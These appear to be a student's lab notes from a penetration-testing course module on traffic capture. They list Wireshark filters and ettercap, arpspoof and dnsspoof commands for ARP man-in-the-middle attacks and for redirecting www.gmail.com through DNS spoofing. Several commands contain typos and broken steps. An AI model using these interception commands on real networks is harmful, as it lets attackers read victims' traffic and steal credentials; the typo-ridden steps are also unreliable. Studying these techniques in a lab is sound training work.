< All Advanced Penetration Testing Notes

Oishi | Advanced Penetration Testing | Module 6 - Traffic Capture

By: Oishi | Related Course: Advanced Penetration Testing | Published: July 25, 2017 | Modified: August 3, 2017
Join Cybrary

NotepadCapture Traffic (pt 2) analyzing Network

Kali

Tool : wireshark

Capture>interfaces > Eth0

Uncheck Use promiscous mode (if on the same network)

Open term. window- ping 192.16864.1.64 (example)

filter: ftp &&ip.dst==192.168.1.64

Filter: ip.scr==192.168.1.64||ftp &&ip.dst==192.168.1.64

domain controller- ubuntu term.>>>

ftp 192.168.1.64

> enter name and pw

> dir

see the files listed> and in wiereshark

 

 

 


Notepadettercap

Kali

man in the middle

> ettercap -Ti eth0 -M arp:remote /192.168.1.1/ / 192.168.1.76

arp spoof out come

> nano/proc/sys/net/ipv4/ip_forward

wireshark > filter TLSv1 or HTTP

ettercap

>nano /etc/ettercap/ettercap.com

(turn off ipv4)

 

 


NotepadTraffic capture (arp)

Address Resolution Protocol (ARP)

 

translate the ip address to Mac address of the network Adapter

Tells host where to send traffic

If we can trick host into sending traffic to the wrong place we can capture traffic in wireshark

————–

Kali = 192.168.20.9

windows xp 192.168.20.10

ubuntu 192.168.20.11

Ubuntu sends traffic destined to windows xp to kali >kali fowrads traffic to ubuntu 

or 

Kali forwards traffic to windows xp> windows xp sends traffic destined for ubuntu to Kali    

—      —      —-     —– —- —    —-

Kali> arpspoof -i eth0 -t 192.168.1.76 192.168.1.80

>cat /proc/sys/net/ipv4/ip_forward

> echo /proc/sys/net/ipv4/ip_forward

>arp

>arp -a (for ubuntu and windows)


NotepadTraffic Capture DNS

DNS Cache Poisoning

>host.txt: 192.168.20.9 www.gmail.com

Restart arpspoofing between gateway and target

>dnsspoof -i eth0 -f host.txt

> arpspoof -i eth0 -t 192.168.1.1 192.168.1.80 (= says I am the gateway)

> nano hosts.txt

> 127.0.0.1 www.gmail.com

>service apache2 start

>dnsspoof -i eth0 -f /roots/hosts.txt

 

 

 

 


< All Advanced Penetration Testing Notes
Join Cybrary

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge

 

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel